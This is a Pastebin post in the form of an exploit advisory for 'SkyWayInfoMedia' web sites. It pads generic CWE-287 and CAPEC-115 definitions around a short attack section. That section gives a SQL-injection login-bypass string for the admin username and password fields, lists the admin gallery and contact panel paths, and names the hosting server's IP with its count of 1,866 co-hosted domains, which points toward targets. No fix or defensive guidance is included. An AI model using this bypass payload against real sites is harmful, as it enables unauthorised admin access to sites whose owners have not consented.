KingSkrupellos

SkyWayInfoMedia Improper Authentication

May 2nd, 2020
114
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.34 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : SkyWayInfoMedia Improper Authentication
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 03 May 2020
  7. # Vendor Homepage : skywayinfomedia.com
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Vulnerability Type : CWE-287 [ Improper Authentication ]
  12. CAPEC-115: Authentication Bypass
  13. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  14. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  15. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  16. # Pastebin : pastebin.com/u/KingSkrupellos
  17.  
  18. ####################################################################
  19.  
  20. # Impact :
  21. ***********
  22. CWE-287 [ Improper Authentication ]
  23.  
  24. Authentication is any process by which a system verifies the identity of a user who wishes
  25. to access it.When an actor claims to have a given identity, the software does not
  26. prove or insufficiently proves that the claim is correct. Improper authentication
  27. occurs when an application improperly verifies the identity of a user.
  28. A software incorrectly validates user's login information and as a result, an attacker can
  29. gain certain privileges within the application or disclose sensitive information that allows
  30. them to access sensitive data and provoke arbitrary code execution.
  31. The weakness is introduced during Architecture and Design, Implementation stages.
  32.  
  33. CAPEC-115 [ Authentication Bypass ]
  34.  
  35. An attacker gains access to application, service, or device with the privileges
  36. of an authorized or privileged user by evading or circumventing an authentication mechanism.
  37. The attacker is therefore able to access protected data without authentication ever having taken place.
  38. This refers to an attacker gaining access equivalent to an authenticated user without ever going
  39. through an authentication procedure. This is usually the result of the attacker using an unexpected
  40. access procedure that does not go through the proper checkpoints where authentication should occur.
  41. For example, a web site might assume that all users will click through a given link in order to get to
  42. secure material and simply authenticate everyone that clicks the link. However, an attacker might be
  43. able to reach secured web content by explicitly entering the path to the content rather than clicking
  44. through the authentication link, thereby avoiding the check entirely. This attack pattern differs from
  45. other authentication attacks in that attacks of this pattern avoid authentication entirely, rather than
  46. faking authentication by exploiting flaws or by stealing credentials from legitimate users.
  47.  
  48. ####################################################################
  49.  
  50. # Authentication Bypass / Improper Authentication / Admin Panel Login Bypass Exploit :
  51. ******************************************************************************
  52. Administrator Username : '=''or'
  53. Administrator Password : '=''or'
  54.  
  55. /admin/gallery.php
  56. /admin/view-gallery.php
  57. /admin/contact.php
  58.  
  59. Reverse IP results (176.74.26.65)
  60. There are 1,866 domains hosted on this server.
  61.  
  62. ####################################################################
  63.  
  64. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  65.  
  66. ####################################################################
Add Comment
Please, Sign In to add comment